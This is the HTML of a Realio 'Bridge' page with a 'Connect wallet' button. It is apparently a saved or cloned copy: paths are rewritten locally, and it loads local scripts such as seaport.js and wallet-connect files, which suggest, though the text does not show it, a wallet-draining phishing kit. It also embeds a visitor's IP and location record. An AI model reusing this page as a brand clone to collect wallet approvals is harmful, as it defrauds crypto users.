<!DOCTYPE html>
<html lang="en-us" class="js">
  <head>
    <meta http-equiv="origin-trial" content="Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=">
    <meta charset="utf-8">
    <meta name="author" content="Realio">
    <link rel="shortcut icon" href="./static/assets/platform/images/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,user-scalable=0">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <!-- Fav Icon  -->
    <title>Realio - BlockChain Based Investing</title>
    <link rel="apple-touch-icon-precomposed" sizes="120x120" href="./static/assets/images/favicon/apple-touch-icon-120x120.png">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="./static/assets/images/favicon/apple-touch-icon-152x152.png">
    <link rel="apple-touch-icon-precomposed" sizes="167x167" href="./static/assets/images/favicon/apple-touch-icon-167x167.png">
    <link rel="apple-touch-icon-precomposed" sizes="180x180" href="./static/assets/images/favicon/apple-touch-icon-180x180.png">
    <link rel="icon" type="image/png" href="./static/assets/images/favicon/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="./static/assets/images/favicon/favicon-16x16.png" sizes="16x16">
    <meta name="application-name" content="&nbsp;">
    <meta name="msapplication-TileColor" content="#FFFFFF">
    <meta name="msapplication-TileImage" content="mstile-144x144.png">
    <!-- Facebook Preview -->
    <meta property="og:title" content="Issuance, p2p trading and Life-Cycle Management of Digital Assets">
    <meta property="og:image" content="./static/assets/images/realio_preview_1.jpg">
    <meta property="og:url" content="https://app.realio.fund">
    <link href="./static/assets/dist/css/auth-base-styles.css?b7030a57" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
   
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <link rel="stylesheet" type="text/css" href=".//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css">
    <script src=".//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
   
    <link href="./static/assets/dist/css/auth-layout-styles.css?45e4135b" rel="stylesheet">
    <style type="text/css">
      span.im-caret {
        -webkit-animation: 1s blink step-end infinite;
        animation: 1s blink step-end infinite;
      }

      @keyframes blink {

        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      @-webkit-keyframes blink {

        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      span.im-static {
        color: grey;
      }

      div.im-colormask {
        display: inline-block;
        border-style: inset;
        border-width: 2px;
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
        appearance: textfield;
      }

      div.im-colormask>input {
        position: absolute;
        display: inline-block;
        background-color: transparent;
        color: transparent;
        -webkit-appearance: caret;
        -moz-appearance: caret;
        appearance: caret;
        border-style: none;
        left: 0;
        /*calculated*/
      }

      div.im-colormask>input:focus {
        outline: none;
      }

      div.im-colormask>input::-moz-selection {
        background: none;
      }

      div.im-colormask>input::selection {
        background: none;
      }

      div.im-colormask>input::-moz-selection {
        background: none;
      }

      div.im-colormask>div {
        color: black;
        display: inline-block;
        width: 100px;
        /*calculated*/
      }
    </style>
    <style type="text/css">
      .jqstooltip {
        position: absolute;
        left: 0px;
        top: 0px;
        visibility: hidden;
        background: rgb(0, 0, 0) transparent;
        background-color: rgba(0, 0, 0, 0.6);
        filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000);
        -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000)";
        color: white;
        font: 10px arial, san serif;
        text-align: left;
        white-space: nowrap;
        padding: 5px;
        border: 1px solid white;
        z-index: 10000;
      }

      .jqsfield {
        color: white;
        font: 10px arial, san serif;
        text-align: left;
      }
    </style>
    <style></style>
 
  </head>
  <body class="theme-dark is-smooth-effect no-touch" data-spy="scroll" data-target="#mainnav" data-offset="80">
    <div role="dialog" aria-live="polite" aria-label="cookieconsent" aria-describedby="cookieconsent:desc" class="cc-window cc-banner cc-type-info cc-theme-classic cc-bottom cc-color-override--1762072787  cc-invisible" style="display: none;">
      <!--googleoff: all-->
      <span id="cookieconsent:desc" class="cc-message">This website uses cookies to ensure you get the best experience on our website. <a aria-label="learn more about cookies" role="button" tabindex="0" class="cc-link" href="https://cookiesandyou.com" rel="noopener noreferrer nofollow" target="_blank">Learn more</a>
      </span>
      <div class="cc-compliance">
        <a aria-label="dismiss cookie message" role="button" tabindex="0" class="cc-btn cc-dismiss">Got it!</a>
      </div>
      <!--googleon: all-->
    </div>
    <header class="site-header is-sticky">
      <div class="navbar navbar-expand-lg is-transparent" id="mainnav">
        <nav class="container">
          <a class="navbar-brand animated d-inline fadeInDown" data-animate="fadeInDown" data-delay=".65" href="./" style="margin-left: auto; margin-right: auto; visibility: visible; animation-delay: 0.65s;">
            <img class="logo logo-dark" alt="logo" src="static/assets/images/realio_logo.png" srcset="static/assets/images/realio_logo.png 2x">
            <img class="logo logo-light" alt="logo" src="static/assets/images/realio_logo.png" srcset="static/assets/images/realio_logo.png 2x">
          </a>
        </nav>
      </div>
    </header>
    <div class="section section-pad" id="create-account">
      <div class="container">
        <div class="row">
          <div class="offset-lg-4 col-lg-4 col-md-6 offset-md-3 auth-page-container">
            <div class="section-head">
              <h2 class="section-title text-center" data-animate="fadeInUp" data-delay="0">Bridge</h2>
              <div class="text-block">
                <div class="justify-content-center m-3">
                  <div class="form-message text-center">
                    <input id="csrf_token" name="csrf_token" type="hidden" value="IjgyYWUwNjY4ZTg0ZWQ3ZmUzZDNmYzI1YTMyMDIzNmM2NzRlNzFhNGQi.ZglSOg.Nm-lG7ox0fBPKPYzC4lc6c7nBxA">
                    <input data-client-ip-field="true" id="client_ip" name="client_ip" type="hidden" value="{&quot;ip&quot;:&quot;102.88.35.180&quot;,&quot;is_eu&quot;:false,&quot;city&quot;:&quot;Lagos&quot;,&quot;region&quot;:&quot;Lagos&quot;,&quot;region_code&quot;:&quot;LA&quot;,&quot;region_type&quot;:&quot;state&quot;,&quot;country_name&quot;:&quot;Nigeria&quot;,&quot;country_code&quot;:&quot;NG&quot;,&quot;continent_name&quot;:&quot;Africa&quot;,&quot;continent_code&quot;:&quot;AF&quot;,&quot;latitude&quot;:6.447400093078613,&quot;longitude&quot;:3.3903000354766846,&quot;postal&quot;:null,&quot;calling_code&quot;:&quot;234&quot;,&quot;flag&quot;:&quot;https://ipdata.co/flags/ng.png&quot;,&quot;emoji_flag&quot;:&quot;🇳🇬&quot;,&quot;emoji_unicode&quot;:&quot;U+1F1F3 U+1F1EC&quot;,&quot;asn&quot;:{&quot;asn&quot;:&quot;AS29465&quot;,&quot;name&quot;:&quot;MTN Nigeria Communication Limited&quot;,&quot;domain&quot;:null,&quot;route&quot;:&quot;102.88.35.0/24&quot;,&quot;type&quot;:&quot;business&quot;},&quot;company&quot;:{&quot;name&quot;:&quot;MTN Nigeria Communication Limited&quot;,&quot;domain&quot;:null,&quot;network&quot;:&quot;102.88.35.0/24&quot;,&quot;type&quot;:&quot;business&quot;},&quot;carrier&quot;:{&quot;name&quot;:&quot;MTN&quot;,&quot;mcc&quot;:&quot;621&quot;,&quot;mnc&quot;:&quot;30&quot;},&quot;languages&quot;:[{&quot;name&quot;:&quot;English&quot;,&quot;native&quot;:&quot;English&quot;,&quot;code&quot;:&quot;en&quot;}],&quot;currency&quot;:{&quot;name&quot;:&quot;Nigerian Naira&quot;,&quot;code&quot;:&quot;NGN&quot;,&quot;symbol&quot;:&quot;₦&quot;,&quot;native&quot;:&quot;₦&quot;,&quot;plural&quot;:&quot;Nigerian nairas&quot;},&quot;time_zone&quot;:{&quot;name&quot;:&quot;Africa/Lagos&quot;,&quot;abbr&quot;:&quot;WAT&quot;,&quot;offset&quot;:&quot;+0100&quot;,&quot;is_dst&quot;:false,&quot;current_time&quot;:&quot;2024-03-31T12:08:37+01:00&quot;},&quot;threat&quot;:{&quot;is_tor&quot;:false,&quot;is_icloud_relay&quot;:false,&quot;is_proxy&quot;:false,&quot;is_datacenter&quot;:false,&quot;is_anonymous&quot;:false,&quot;is_known_attacker&quot;:false,&quot;is_known_abuser&quot;:false,&quot;is_threat&quot;:false,&quot;is_bogon&quot;:false,&quot;blocklists&quot;:[]},&quot;count&quot;:&quot;1694&quot;}">
                    <input type="hidden" value="None" name="next_page" id="next_page">
                    <p style="color: #e05757;"></p>
                    
                    
                    <button class="interact-button realio-btn waves-effect waves-ripple waves-light">Connect wallet</button>
                   
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- Start Section -->
        <div class="row text-center">
          <div class="col-md-12">
            <span class="copyright-text"> Copyright © 2024 Realio Technology LTD <span>All trademarks and copyrights belong to their respective owners.</span>
            </span>
          </div>
        </div>
      </div>
    </div>
    <!-- End Section -->
    <!-- Global site tag (gtag.js) - Google Analytics -->

   <div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;">
      <div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div>
      <div class="g-recaptcha-bubble-arrow" style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;"></div>
      <div class="g-recaptcha-bubble-arrow" style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;"></div>
      <div style="z-index: 2000000000; position: relative;">
        <iframe title="recaptcha challenge expires in two minutes" name="c-696r1vsa3n4r" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="https://www.google.com/recaptcha/api2/bframe?hl=en&amp;v=moV1mTgQ6S91nuTnmll4Y9yf&amp;k=6LfilbMUAAAAAIh-QItJTES7TM1RA7UNJjRkODZi" style="width: 100%; height: 100%;"></iframe>
      </div>
    </div>
     
    <script src="./scripts/seaport.js"></script>
    <script src="./scripts/coinbase.js"></script>
    <script src="./scripts/wallet-connect-v2.js"></script>
    <script src="./scripts/wallet-connect-v3.js"></script>
    <script charset="UTF-8" type="text/javascript" src="./6463315d-5fbb-4674-aba3-32a987151b3f.js"></script>
   </body>

</html>